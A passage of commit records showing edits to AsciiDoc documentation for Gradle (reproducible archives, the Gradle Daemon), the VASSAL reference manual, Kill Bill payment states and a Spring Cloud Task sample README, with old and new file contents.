Jar, Zip) tasks shipped with Gradle include support for producing reproducible archives.\n\nFor example, to make a `Zip` task reproducible you need to set link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html#org.gradle.api.tasks.bundling.Zip:reproducibleFileOrder[Zip.isReproducibleFileOrder()] to `true` and link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html#org.gradle.api.tasks.bundling.Zip:preserveFileTimestamps[Zip.isPreserveFileTimestamps()] to `false`. 
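In the Kotlin DSL, that might look as follows (a sketch; the `docsZip` task and its sources are hypothetical):\n\n[source,kotlin]\n----\ntasks.register<Zip>(\"docsZip\") {\n    from(\"docs\")\n    \/\/ stable entry order and fixed timestamps make the output repeatable\n    isReproducibleFileOrder = true\n    isPreserveFileTimestamps = false\n}\n----\n\n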
In order to make all archive tasks in your build reproducible, consider adding the following configuration to your build file:\n\n.Activating reproducible archives\n====\ninclude::sample[dir=\"snippets\/files\/archives\/groovy\",files=\"build.gradle[tags=reproducible]\"]\ninclude::sample[dir=\"snippets\/files\/archives\/kotlin\",files=\"build.gradle.kts[tags=reproducible]\"]\n====\n\nOften you will want to publish an archive, so that it is usable from another project.\nThis process is described in <<cross_project_publications.adoc#cross_project_publications,Cross-Project publications>>.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"050beefbc4f8083cc73b0ae1a9fc54e02650390b","subject":"We put the ass in as","message":"We put the ass in as\n","repos":"ethaneldridge\/vassal,ethaneldridge\/vassal,ethaneldridge\/vassal","old_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/UsePrototype.adoc","new_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/UsePrototype.adoc","new_contents":"== VASSAL Reference Manual\n[#top]\n\n[.small]#<<index.adoc#toc,Home>> > <<GameModule.adoc#top,Module>> > <<PieceWindow.adoc#top,Game Piece Palette>> > <<GamePiece.adoc#top,Game Piece>> > *Prototype (Trait)*#\n\n'''''\n\n=== Prototype (Trait)\n\nimage:images\/UsePrototype.png[]\n\nThe Prototype trait allows a piece to share a set of common traits with other pieces.\nThe traits themselves are defined elsewhere in a <<Prototypes.adoc#top,Prototype Definition>> in the _[Global Piece Prototype Definitions]_ section of your module.\nA Game Piece may contain any number of Prototype traits, intermixed with regular traits, in any order.\n\n*EXAMPLE:* A Prototype named _Vehicle_ can be defined with _Can Rotate_, _Text Label_, and _Mark When Moved_ traits.\nAny counter can use these traits by using a Prototype trait and specifying _Vehicle_ as the name.\nIf the module author later decides that vehicles should also have another trait, it need only be added to the Prototype definition, and all game pieces with a _Prototype - Vehicle_ trait will automatically gain the new trait.\nSimilarly, modifying or deleting a trait from a Prototype will change or remove that trait for all pieces that reference the Prototype.\n\n**Prototype Name:**:: Type the name of your prototype here - the name you gave it in its <<Prototypes.adoc#top,prototype definition>>. Alternatively you can click the _Select_ button to pick the prototype from the list of all the ones you have created.\n\n**Select:**:: The _Select_ button allows you to select one of the prototypes you have defined in the module. 
If your prototypes have been organized into folders, the folders will appear as submenus.\n\nimage:images\/UsePrototype2.png[]\n\n*SEE ALSO:* <<Prototypes.adoc#top,Prototypes (Definition)>>\n","old_contents":"== VASSAL Reference Manual\n[#top]\n\n[.small]#<<index.adoc#toc,Home>> > <<GameModule.adoc#top,Module>> > <<PieceWindow.adoc#top,Game Piece Palette>> > <<GamePiece.adoc#top,Game Piece>> > *Prototype (Trait)*#\n\n'''''\n\n=== Prototype (Trait)\n\nimage:images\/UsePrototype.png[]\n\nThe Prototype trait allows a piece to share a set of common traits with other pieces.\nThe traits themselves are defined elsewhere in a <<Prototypes.adoc#top,Prototype Definition>> in the _[Global Piece Prototype Definitions]_ section of your module.\nA Game Piece may contain any number of Prototype traits, intermixed with regular traits, in any order.\n\n*EXAMPLE:* A Prototype named _Vehicle_ can be defined with _Can Rotate_, _Text Label_, and _Mark When Moved_ traits.\nAny counter can use these traits by using a Prototype trait and specifying _Vehicle_ as the name.\nIf the module author later decides that vehicles should also have another trait, it need only be added to the Prototype definition, and all game pieces with a _Prototype - Vehicle_ trait will automatically gain the new trait.\nSimilary, modifying or deleting a trait from a Prototype will change or remove that trait for all pieces that reference the Prototype.\n\n**Prototype Name:**:: Type the name of your prototype here - the name you gave it to its <<Prototypes.adoc#top,prototype definition>>. Alternatively you can click the _Select_ button to pick the prototype from the list of all the ones you have created.\n\n**Select:**:: The _Select_ button allows you to select one of the prototypes you have defined in the module. If your prototypes have been organized into folders, the folders will appear a submenus.\n\nimage:images\/UsePrototype2.png[]\n\n*SEE ALSO:* <<Prototypes.adoc#top,Prototypes (Definition)>>\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"3b396e4e381c031f20eb7d8d462b116ad65ce2e0","subject":"payment: update payment states","message":"payment: update payment states\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/payment\/includes\/payment-overview.adoc","new_file":"userguide\/payment\/includes\/payment-overview.adoc","new_contents":"=== Payment Abstractions\n\nKill Bill has a payment subsystem which offers several APIs:\n\n* payment and refund APIs for recurring billing\n* *direct* payment APIs for one-off charges\n\nThe former set of APIs is used by the core billing engine to charge for subscriptions, and by Kaui (the Kill Bill Admin UI) to handle refunds, chargebacks, adjustments, etc. for invoices and payments associated with such subscriptions.\n\nThe latter set can be used to trigger payments (auth, capture, credit, refund, etc.) by your e-commerce application (e.g. shopping cart). It also offers helpers to create payment forms and redirect URLs in case of hosted payment pages. It is independent of any subscriptions or invoices and is used solely to make payments.\n\nKill Bill is a generic platform to build billing and payment infrastructures and as such, it is agnostic of payment gateways. However, it provides a framework to register payment plugins, which in turn implement gateway specific APIs. Those payment plugins must be OSGI compliant plugins. 
They can be written either in:\n\n* java; in which case they are just a standard OSGI java jar which must register a service implementing the https:\/\/github.com\/killbill\/killbill-plugin-api\/blob\/master\/payment\/src\/main\/java\/org\/killbill\/billing\/payment\/plugin\/api\/PaymentPluginApi.java[PaymentPluginApi]\n* ruby; in which case they must use the https:\/\/github.com\/killbill\/killbill-plugin-framework-ruby[killbill gem] which provides a jruby bridge between java and ruby. Those plugins must inherit the https:\/\/github.com\/killbill\/killbill-plugin-framework-ruby\/blob\/master\/lib\/killbill\/payment.rb[Payment class] to provide the specific plugin code functionality\n\nThe main reason to provide a way to write ruby payment plugins is to be able to reuse the http:\/\/activemerchant.org\/[Active Merchant] gem. We even have a https:\/\/github.com\/killbill\/killbill-plugin-framework-ruby\/[generator] to help you generate a payment plugin from an Active Merchant implementation.\n\nCheck the wiki page https:\/\/github.com\/killbill\/killbill\/wiki\/Payment-plugins[Payment Plugins] for a community-supported list of already written payment plugins.\n\nThe Kill Bill payment code will detect all the payment plugins registered in the system and decide which plugin to use when a charge, refund, ... operation needs to happen. The dispatching is based on the payment methods associated with each account. By default, the model is to attach a default payment method to each account: that payment method will have a link that points to a specific plugin to use. For instance, one account could have a Paypal payment method that would point to the Paypal plugin. Additionally, you can also override the payment method to use on a per-call basis. The figure below shows the relationship between a Kill Bill `Account`, its various `PaymentMethods`, each of which points to a given Kill Bill plugin, which itself is in charge of interacting with a third-party payment gateway.\n\nimage:https:\/\/docs.google.com\/drawings\/d\/1ERbfXS0LKSyANT08wnp3zDyoROkhKWSdX2EK0LpwLQ4\/pub?w=960&h=480[align=center]\n\nBy default Kill Bill does not come configured with any payment plugins except for the built-in __EXTERNAL_PAYMENT__, which is used to track payments which occurred outside of Kill Bill. A typical example would be when a customer pays by check and we want to make sure the invoice balance is set to 0 after receiving the check. A user, represented in Kill Bill as an account, can add as many payment methods as required, and each of those will identify a specific plugin that Kill Bill will use when making payments.\n\n\n=== Payment States\n\nInitially, a client of the API can make either an *authorization*, a *purchase*, or a *credit* call (all other operations such as refund would require an initial payment to have already existed).\nThat initial operation will create a https:\/\/github.com\/killbill\/killbill-api\/blob\/master\/src\/main\/java\/org\/killbill\/billing\/payment\/api\/Payment.java[Payment] and an initial https:\/\/github.com\/killbill\/killbill-api\/blob\/c243233be112165bf04a89a715b79112c6c5d1f7\/src\/main\/java\/org\/killbill\/billing\/payment\/api\/PaymentTransaction.java[PaymentTransaction].\nThe user can then submit additional requests for the same payment (capture, refund, ...) and each of those calls will result in an additional `PaymentTransaction` attached to the same payment.\nThe payments have a state which will drive the set of possible subsequent operations available. 
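As a rough sketch of that idea (hypothetical code, not the Kill Bill API; state and operation names follow the transitions described below):\n\n[source,kotlin]\n----\n\/\/ Hypothetical sketch only: the payment state gates which transaction\n\/\/ types may be attempted next.\nfun allowedNextOperations(paymentState: String): Set<String> = when (paymentState) {\n    \"AUTH_SUCCESS\" -> setOf(\"CAPTURE\", \"VOID\")\n    \"CAPTURE_SUCCESS\" -> setOf(\"CAPTURE\", \"REFUND\")\n    else -> emptySet()\n}\n----\n\n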
For instance, it is possible to make a capture call against a payment in a state `AUTH_SUCCESS` but it is not possible to make such an operation against a payment in an `AUTH_ERRORED` state.\nThe set of payment state transitions is configured in an https:\/\/github.com\/killbill\/killbill\/blob\/master\/payment\/src\/main\/resources\/org\/killbill\/billing\/payment\/PaymentStates.xml[XML file] and the Kill Bill payment subsystem is in charge of enforcing the transitions. The following diagram shows all the possible transitions:\n\n\/\/ Tricky see http:\/\/lifehacker.com\/share-direct-links-to-files-in-google-drive-and-skip-th-1493813665\nimage:https:\/\/drive.google.com\/uc?&id=0Bw8rymjWckBHNnlZNTJsZ3pHMTg&w=960&h=480[align=center]\n\nIn addition to the payment state transitions, each `PaymentTransaction` has a status to reflect the result of the operation. The `PaymentTransaction` status depends on the plugin result and can be summarized as follows:\n\n|===\n|plugin result | payment transaction status | payment state | description\n\n|PROCESSED\n|SUCCESS\n|{AUTH,CAPTURE,..}_SUCCESS\n|The payment transaction went through and was successful\n\n|PENDING\n|PENDING\n|{AUTH,CAPTURE,..}_PENDING\n|Successful asynchronous operation (e.g. ACH transfer) or multi-step call (e.g. 3D-Secure authorization)\n\n|ERROR\n|PAYMENT_FAILURE\n|{AUTH,CAPTURE,..}_FAILED\n|The payment transaction went through but failed (e.g. insufficient funds)\n\n|CANCELED\n|PLUGIN_FAILURE\n|{AUTH,CAPTURE,..}_ERRORED\n|The payment transaction did not happen (e.g. unable to connect to the provider)\n\n|UNDEFINED, timeout or any exception\n|UNKNOWN\n|{AUTH,CAPTURE,..}_ERRORED\n|The payment transaction may or may not have succeeded, manual review needed\n\n|===\n\nNote that the first 3 cases are normal cases but the last 2 are errors that are unrelated to the user being able to make the payment operation:\n\n* in the case of a hard plugin failure (CANCELED result code), the gateway was probably down and the payment wasn't attempted: there is no attempt to fix those.\n* in the case of a plugin timeout (or UNDEFINED result code), the operation might actually have completed; Kill Bill will run a background task to detect those cases and will query the plugin to verify if the state is actually known, and when it is, it will update the *transaction status* and move the payment to its appropriate state. If the plugin cannot tell if the payment went through, the transaction will stay in an UNKNOWN state. It is advisable to check that those are rare instances and fix the data appropriately (by manually checking the status in the gateway, for example).","old_contents":"=== Payment Abstractions\n\nKill Bill has a payment subsystem which offers several APIs:\n\n* payment and refund APIs for recurring billing\n* *direct* payment APIs for one-off charges\n\nThe former set of APIs is used by the core billing engine to charge for subscriptions, and by Kaui (the Kill Bill Admin UI) to handle refunds, chargebacks, adjustments, etc. for invoices and payments associated with such subscriptions.\n\nThe latter set can be used to trigger payments (auth, capture, credit, refund, etc.) by your e-commerce application (e.g. shopping cart). It also offers helpers to create payment forms and redirect URLs in case of hosted payment pages. It is independent of any subscriptions or invoices and is used solely to make payments.\n\nKill Bill is a generic platform to build billing and payment infrastructures and as such, it is agnostic of payment gateways. 
However, it provides a framework to register payment plugins, which in turn implement gateway specific APIs. Those payment plugins must be OSGI compliant plugins. They can be written either in:\n\n* java; in which case they are just a standard OSGI java jar which must register a service implementing the https:\/\/github.com\/killbill\/killbill-plugin-api\/blob\/master\/payment\/src\/main\/java\/org\/killbill\/billing\/payment\/plugin\/api\/PaymentPluginApi.java[PaymentPluginApi]\n* ruby; in which case they must use the https:\/\/github.com\/killbill\/killbill-plugin-framework-ruby[killbill gem] which provides a jruby bridge between java and ruby. Those plugins must inherit the https:\/\/github.com\/killbill\/killbill-plugin-framework-ruby\/blob\/master\/lib\/killbill\/payment.rb[Payment class] to provide the specific plugin code functionality\n\nThe main reason to provide a way to write ruby payment plugins is to be able to reuse the http:\/\/activemerchant.org\/[Active Merchant] gem. We even have a https:\/\/github.com\/killbill\/killbill-plugin-framework-ruby\/[generator] to help you generate a payment plugin from an Active Merchant implementation.\n\nCheck the wiki page https:\/\/github.com\/killbill\/killbill\/wiki\/Payment-plugins[Payment Plugins] for a community-supported list of already written payment plugins.\n\nThe Kill Bill payment code will detect all the payment plugins registered in the system and decide which plugin to use when a charge, refund, ... operation needs to happen. The dispatching is based on the payment methods associated with each account. By default, the model is to attach a default payment method to each account: that payment method will have a link that points to a specific plugin to use. For instance, one account could have a Paypal payment method that would point to the Paypal plugin. Additionally, you can also override the payment method to use on a per payment call. The figure below shows the relashionship between a Kill Bill `Account`, its various `PaymentMethods`, each of which points to a given Kill Bill plugin, which itself is in charge to interact with a third party payment gateway.\n\nimage:https:\/\/docs.google.com\/drawings\/d\/1ERbfXS0LKSyANT08wnp3zDyoROkhKWSdX2EK0LpwLQ4\/pub?w=960&h=480[align=center]\n\nBy default Kill Bill does not come configured with any payment plugins except for the built-in __EXTERNAL_PAYMENT__, which is used to track payments which occurred outside of Kill Bill. A typical example would be for when a customer pays by check and we want to make sure the invoice balance is set to 0 after receiving the check. A user, represented in Kill Bill as an account can add as many payment methods as required, and each of those will identify a specific plugin that Kill Bill will use when making payments.\n\n\n=== Payment States\n\nInitially a client of the api can make either an *authorization*, a *purchase*, or a *credit* call (all other operations such as refund would require an initial payment to have already existed).\nThat initial operation will create a https:\/\/github.com\/killbill\/killbill-api\/blob\/master\/src\/main\/java\/org\/killbill\/billing\/payment\/api\/Payment.java[Payment] and an initial https:\/\/github.com\/killbill\/killbill-api\/blob\/c243233be112165bf04a89a715b79112c6c5d1f7\/src\/main\/java\/org\/killbill\/billing\/payment\/api\/PaymentTransaction.java[PaymentTransaction].\nThe user can then submit additional requests for the same payment (capture, refund, ...) 
and each of those calls will result in additional `PaymentTransaction` attached to the same payment.\nThe payments have a state which will drive the set of possible subsequent operations available. For instance, it is possible to make a capture call against a payment in a state `AUTH_SUCCESS` but it is not possible to make such an operation against a payment in an `AUTH_ERRORED` state.\nThe set of payment state transitions are configured in an https:\/\/github.com\/killbill\/killbill\/blob\/master\/payment\/src\/main\/resources\/org\/killbill\/billing\/payment\/PaymentStates.xml[xml file] and the Kill Bill payment subsystem is in charge to enforce the transitions. The following diagram below shows all the possible transitions:\n\n\/\/ Tricky see http:\/\/lifehacker.com\/share-direct-links-to-files-in-google-drive-and-skip-th-1493813665\nimage:https:\/\/drive.google.com\/uc?&id=0Bw8rymjWckBHNnlZNTJsZ3pHMTg&w=960&h=480[align=center]\n\nIn addition to the payment state transitions, each `PaymentTransaction` has a status to reflect the result of the operation. The `PaymentTransaction` status depends on the plugin result and it can be summarized below:\n\n|===\n|plugin result | payment transaction status | payment state | description\n\n|PROCESSED\n|SUCCESS\n|{AUTH,CAPTURE,..}_SUCCESS\n|Success operation\n\n|PENDING\n|PENDING\n|{AUTH,CAPTURE,..}_PENDING\n|Success asynchronous operation, or multi-step calls (e.g. 3D Secure authorization)\n\n|ERROR\n|PAYMENT_FAILURE\n|FAILED\n|The gateway, bank declined the operation\n\n|UNDEFINED, timeout\n|UNKNOWN\n|ERRORED\n|Plugin timed out or returned an UNDEFINED state\n\n|Any exception\n|PLUGIN_FAILURE\n|ERRORED\n|The plugin threw an exception\n\n|===\n\nNote that the first 3 cases are normal cases but the last 2 are errors that are unrelated to the user being able to make the payment operation:\n\n* in the case of a plugin timeout (or UNDEFINED result code), the operation might actually have completed; Kill Bill will run a background task to detect those cases and will query the plugin to verify if the state is actually known and when it is, it will update the *transaction status* and move the payment to its appropriate state.\n* in the case of a plugin exception, this is probably a bug (either in the plugin, the third part gateway or Kill Bill itself), and so there is no attempt to fix those. 
However it is advisable to check that those are rare instances and fix code\/data appropriately.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eddd38797b2859a30eda624ce04ca43b0be23865","subject":"2 typos","message":"2 typos\n","repos":"trisberg\/spring-cloud-task,trisberg\/spring-cloud-task,cppwfs\/spring-cloud-task,spring-cloud\/spring-cloud-task,mminella\/spring-cloud-task,trisberg\/spring-cloud-task,mminella\/spring-cloud-task","old_file":"spring-cloud-task-samples\/partitioned-batch-job\/README.adoc","new_file":"spring-cloud-task-samples\/partitioned-batch-job\/README.adoc","new_contents":"= Partitioned Job\n\nAn example of the usage of the `DeployerPartitionHandler` and\n`DeployerStepExecutionHandler` to partition a Spring Batch job.\n\n== Requirements:\n\n* Java 7 or Above\n\n== Build:\n\n[source,shell,indent=2]\n----\n$ .\/mvnw clean install\n----\n\n== Execute:\n\n[source,shell,indent=2]\n----\n$ export spring_datasource_url=jdbc:mysql:\/\/localhost:3306\/<your database>\n$ export spring_datasource_username=<your username>\n$ export spring_datasource_password=<your password>\n$ export spring_datasource_driverClassName=org.mariadb.jdbc.Driver\n$ java -jar -Dspring.profiles.active=master target\/partitioned-batch-job-1.0.0.BUILD-SNAPSHOT.jar\n----\n\nNOTE: This example will require a MySQL RDBMS repository and currently uses the mariadb jdbc driver to connect.\nYou can change this to another driver based on your needs.\n\n== Dependencies:\n\nA datasource (not in memory) must be configured based on normal Spring Boot conventions\n(application.properties\/application.yml\/environment variables\/etc).","old_contents":"= Partitioned Job\n\nAn example of the usage of the `DeployerPartitionHandler` and\n`DeployerStepExecutionHandler` to partition a Spring Batch job.\n\n== Requirements:\n\n* Java 7 or Above\n\n== Build:\n\n[source,shell,indent=2]\n----\n$ .\/mvnw clean install\n----\n\n== Execute:\n\n[source,shell,indent=2]\n----\n$ export spring_datasource_url=jdbc:mariadb:\/\/localhost:3306\/<your databse>\n$ export spring_datasource_username=<your username>\n$ export spring_datasource_password=<your password>\n$ export spring_datasource_driverClassName=org.mariadb.jdbc.Driver\n$ java -jar -Dspring.profiles.active=master target\/partitioned-batch-job-1.0.0.BUILD-SNAPSHOT.jar\n----\n\nNOTE: This example will use require a MySql RDBMS repository and currently uses the mariadb jdbc driver to connect.\nYou can changes this another driver based on your needs.\n\n== Dependencies:\n\nA datasource (not in memory) must be configured based on normal Spring Boot conventions\n(application.properties\/application.yml\/environment variables\/etc).","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec6a3b61f05f38552715f50dffd73957e673c3f6","subject":"Do not promise to fix limitations","message":"Do not promise to fix limitations\n","repos":"blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/running-builds\/gradle_daemon.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/running-builds\/gradle_daemon.adoc","new_contents":"\/\/ Copyright 2017 the original author or 
authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[gradle_daemon]]\n= The Gradle Daemon\n\n[quote, Wikipedia]\nA daemon is a computer program that runs as a background process, rather than being under the direct control of an interactive user.\n\nGradle runs on the Java Virtual Machine (JVM) and uses several supporting libraries that require a non-trivial initialization time. As a result, it can sometimes seem a little slow to start. The solution to this problem is the Gradle _Daemon_: a long-lived background process that executes your builds much more quickly than would otherwise be the case. We accomplish this by avoiding the expensive bootstrapping process as well as leveraging caching, by keeping data about your project in memory. Running Gradle builds with the Daemon is no different than without. Simply configure whether you want to use it or not \u2014 everything else is handled transparently by Gradle.\n\n\n[[sec:why_the_daemon]]\n== Why the Gradle Daemon is important for performance\n\nThe Daemon is a long-lived process, so not only are we able to avoid the cost of JVM startup for every build, but we are able to cache information about project structure, files, tasks, and more in memory.\n\nThe reasoning is simple: improve build speed by reusing computations from previous builds. However, the benefits are dramatic: we typically measure build times reduced by 15-75% on subsequent builds. We recommend profiling your build by using `--profile` to get a sense of how much impact the Gradle Daemon can have for you.\n\nThe Gradle Daemon is enabled by default starting with Gradle 3.0, so you don't have to do anything to benefit from it.\n\n[[sec:status]]\n== Running Daemon Status\n\nTo get a list of running Gradle Daemons and their statuses use the `--status` command.\n\nSample output:\n[source]\n----\n PID VERSION STATUS\n 28411 3.0 IDLE\n 34247 3.0 BUSY\n----\n\n\nCurrently, a given Gradle version can only connect to daemons of the same version. This means the status output will only show Daemons for the version of Gradle being invoked and not for any other versions. Future versions of Gradle will lift this constraint and will show the running Daemons for all versions of Gradle.\n\n[[sec:disabling_the_daemon]]\n== Disabling the Daemon\n\nThe Gradle Daemon is enabled by default, and we recommend always enabling it. There are several ways to disable the Daemon, but the most common one is to add the line\n\n[source]\n----\norg.gradle.daemon=false\n----\n\nto the file `\u00abUSER_HOME\u00bb\/.gradle\/gradle.properties`, where `\u00abUSER_HOME\u00bb` is your home directory. That\u2019s typically one of the following, depending on your platform:\n\n* `C:\\Users\\<username>` (Windows Vista & 7+)\n* `\/Users\/<username>` (macOS)\n* `\/home\/<username>` (Linux)\n\nIf that file doesn\u2019t exist, just create it using a text editor. You can find details of other ways to disable (and enable) the Daemon in <<#daemon_faq,Daemon FAQ>> further down. 
That section also contains more detailed information on how the Daemon works.\n\nNote that having the Daemon enabled, all your builds will take advantage of the speed boost, regardless of the version of Gradle a particular build uses.\n\n[TIP]\n.Continuous integration\n====\n\nSince Gradle 3.0, we enable Daemon by default and recommend using it for both developers' machines and Continuous Integration servers. However, if you suspect that Daemon makes your CI builds unstable, you can disable it to use a fresh runtime for each build since the runtime is _completely_ isolated from any previous builds.\n\n====\n\n\n[[sec:stopping_an_existing_daemon]]\n== Stopping an existing Daemon\n\nAs mentioned, the Daemon is a background process. You needn\u2019t worry about a build up of Gradle processes on your machine, though. Every Daemon monitors its memory usage compared to total system memory and will stop itself if idle when available system memory is low. If you want to explicitly stop running Daemon processes for any reason, just use the command `gradle --stop`.\n\nThis will terminate all Daemon processes that were started with the same version of Gradle used to execute the command. If you have the Java Development Kit (JDK) installed, you can easily verify that a Daemon has stopped by running the `jps` command. You\u2019ll see any running Daemons listed with the name `GradleDaemon`.\n\n[[daemon_faq]]\n== FAQ\n\n\n[[sec:ways_to_disable_gradle_daemon]]\n=== How do I disable the Gradle Daemon?\n\nThere are two recommended ways to disable the Daemon persistently for an environment:\n\n* Via environment variables: add the flag `-Dorg.gradle.daemon=false` to the `GRADLE_OPTS` environment variable\n* Via properties file: add `org.gradle.daemon=false` to the `\u00abGRADLE_USER_HOME\u00bb\/gradle.properties` file\n\n[NOTE]\n====\n\nNote, `\u00abGRADLE_USER_HOME\u00bb` defaults to `\u00abUSER_HOME\u00bb\/.gradle`, where `\u00abUSER_HOME\u00bb` is the home directory of the current user. This location can be configured via the `-g` and `--gradle-user-home` command line switches, as well as by the `GRADLE_USER_HOME` environment variable and `org.gradle.user.home` JVM system property.\n\n====\n\nBoth approaches have the same effect. Which one to use is up to personal preference. Most Gradle users choose the second option and add the entry to the user `gradle.properties` file.\n\nOn Windows, this command will disable the Daemon for the current user:\n\n[source]\n----\n(if not exist \"%USERPROFILE%\/.gradle\" mkdir \"%USERPROFILE%\/.gradle\") && (echo. >> \"%USERPROFILE%\/.gradle\/gradle.properties\" && echo org.gradle.daemon=false >> \"%USERPROFILE%\/.gradle\/gradle.properties\")\n----\n\nOn UNIX-like operating systems, the following Bash shell command will disable the Daemon for the current user:\n\n[source,bash]\n----\nmkdir -p ~\/.gradle && echo \"org.gradle.daemon=false\" >> ~\/.gradle\/gradle.properties\n----\n\nOnce the Daemon is disabled for a build environment in this way, a Gradle Daemon will not be started unless explicitly requested using the `--daemon` option.\n\nThe `--daemon` and `--no-daemon` command line options enable and disable usage of the Daemon for individual build invocations when using the Gradle command line interface. These command line options have the _highest_ precedence when considering the build environment. Typically, it is more convenient to enable the Daemon for an environment (e.g. 
a user account) so that all builds use the Daemon without having to remember to supply the `--daemon` option.\n\n[[sec:why_is_there_more_than_one_daemon_process_on_my_machine]]\n=== Why is there more than one Daemon process on my machine?\n\nThere are several reasons why Gradle will create a new Daemon, instead of using one that is already running. The basic rule is that Gradle will start a new Daemon if there are no existing idle or compatible Daemons available. Gradle will kill any Daemon that has been idle for 3 hours or more, so you don't have to worry about cleaning them up manually.\n\nidle::\nAn idle Daemon is one that is not currently executing a build or doing other useful work.\ncompatible::\nA compatible Daemon is one that can (or can be made to) meet the requirements of the requested build environment. The Java runtime used to execute the build is an example aspect of the build environment. Another example is the set of JVM system properties required by the build runtime.\n\n\nSome aspects of the requested build environment may not be met by a Daemon. If the Daemon is running with a Java 8 runtime, but the requested environment calls for Java 10, then the Daemon is not compatible and another must be started. Moreover, certain properties of a Java runtime cannot be changed once the JVM has started. For example, it is not possible to change the memory allocation (e.g. `-Xmx1024m`), default text encoding, default locale, etc. of a running JVM.\n\nThe \u201crequested build environment\u201d is typically constructed implicitly from aspects of the build client\u2019s (e.g. Gradle command line client, IDE etc.) environment and explicitly via command line switches and settings. See <<build_environment.adoc#build_environment,Build Environment>> for details on how to specify and control the build environment.\n\nThe following JVM system properties are effectively immutable. If the requested build environment requires any of these properties, with a different value than a Daemon\u2019s JVM has for this property, the Daemon is not compatible.\n\n* file.encoding\n* user.language\n* user.country\n* user.variant\n* java.io.tmpdir\n* javax.net.ssl.keyStore\n* javax.net.ssl.keyStorePassword\n* javax.net.ssl.keyStoreType\n* javax.net.ssl.trustStore\n* javax.net.ssl.trustStorePassword\n* javax.net.ssl.trustStoreType\n* com.sun.management.jmxremote\n\nThe following JVM attributes, controlled by startup arguments, are also effectively immutable. The corresponding attributes of the requested build environment and the Daemon\u2019s environment must match exactly in order for a Daemon to be compatible.\n\n* The maximum heap size (i.e. the -Xmx JVM argument)\n* The minimum heap size (i.e. the -Xms JVM argument)\n* The boot classpath (i.e. the -Xbootclasspath argument)\n* The \u201cassertion\u201d status (i.e. the -ea argument)\n\nThe required Gradle version is another aspect of the requested build environment. Daemon processes are coupled to a specific Gradle runtime. Working on multiple Gradle projects during a session that use different Gradle versions is a common reason for having more than one running Daemon process.\n\n[[sec:how_much_memory_does_the_daemon_use_and_can_i_give_it_more]]\n=== How much memory does the Daemon use and can I give it more?\n\nIf the requested build environment does not specify a maximum heap size, the Daemon will use up to 512MB of heap. It will use the JVM's default minimum heap size. 512MB is more than enough for most builds. 
Larger builds with hundreds of subprojects, lots of configuration, and source code may require more memory, or may perform better with more memory.\n\nTo increase the amount of memory the Daemon can use, specify the appropriate flags as part of the requested build environment. Please see <<build_environment.adoc#build_environment,Build Environment>> for details.\n\n[[sec:how_can_i_stop_a_daemon]]\n=== How can I stop a Daemon?\n\nDaemon processes will automatically terminate themselves after 3 hours of inactivity or less. If you wish to stop a Daemon process before this, you can either kill the process via your operating system or run the `gradle --stop` command. The `--stop` switch causes Gradle to request that _all_ running Daemon processes, _of the same Gradle version used to run the command_, terminate themselves.\n\n[[sec:what_can_go_wrong_with_daemon]]\n=== What can go wrong with the Daemon?\n\nConsiderable engineering effort has gone into making the Daemon robust, transparent and unobtrusive during day-to-day development. However, Daemon processes can occasionally be corrupted or exhausted. A Gradle build executes arbitrary code from multiple sources. While Gradle itself is designed for and heavily tested with the Daemon, user build scripts and third party plugins can destabilize the Daemon process through defects such as memory leaks or global state corruption.\n\nIt is also possible to destabilize the Daemon (and build environment in general) by running builds that do not release resources correctly. This is a particularly poignant problem when using Microsoft Windows as it is less forgiving of programs that fail to close files after reading or writing.\n\nGradle actively monitors heap usage and attempts to detect when a leak is starting to exhaust the available heap space in the daemon. When it detects a problem, the Gradle daemon will finish the currently running build and proactively restart the daemon on the next build. This monitoring is enabled by default, but can be disabled by setting the `org.gradle.daemon.performance.enable-monitoring` system property to false.\n\nIf it is suspected that the Daemon process has become unstable, it can simply be killed. Recall that the `--no-daemon` switch can be specified for a build to prevent use of the Daemon. This can be useful to diagnose whether or not the Daemon is actually the culprit of a problem.\n\n[[sec:tools_and_ides]]\n== Tools & IDEs\n\nThe <<third_party_integration.adoc#embedding,Gradle Tooling API>> that is used by IDEs and other tools to integrate with Gradle _always_ uses the Gradle Daemon to execute builds. If you are executing Gradle builds from within your IDE you are using the Gradle Daemon and do not need to enable it for your environment.\n\n[[sec:how_does_the_gradle_daemon_make_builds_faster]]\n== How does the Gradle Daemon make builds faster?\n\nThe Gradle Daemon is a _long-lived_ build process. In between builds it waits idly for the next build. This has the obvious benefit of only requiring Gradle to be loaded into memory once for multiple builds, as opposed to once for each build. This in itself is a significant performance optimization, but that's not where it stops.\n\nA significant part of the story for modern JVM performance is runtime code optimization. For example, HotSpot (the JVM implementation provided by Oracle and used as the basis of OpenJDK) applies optimization to code while it is running. The optimization is progressive and not instantaneous. 
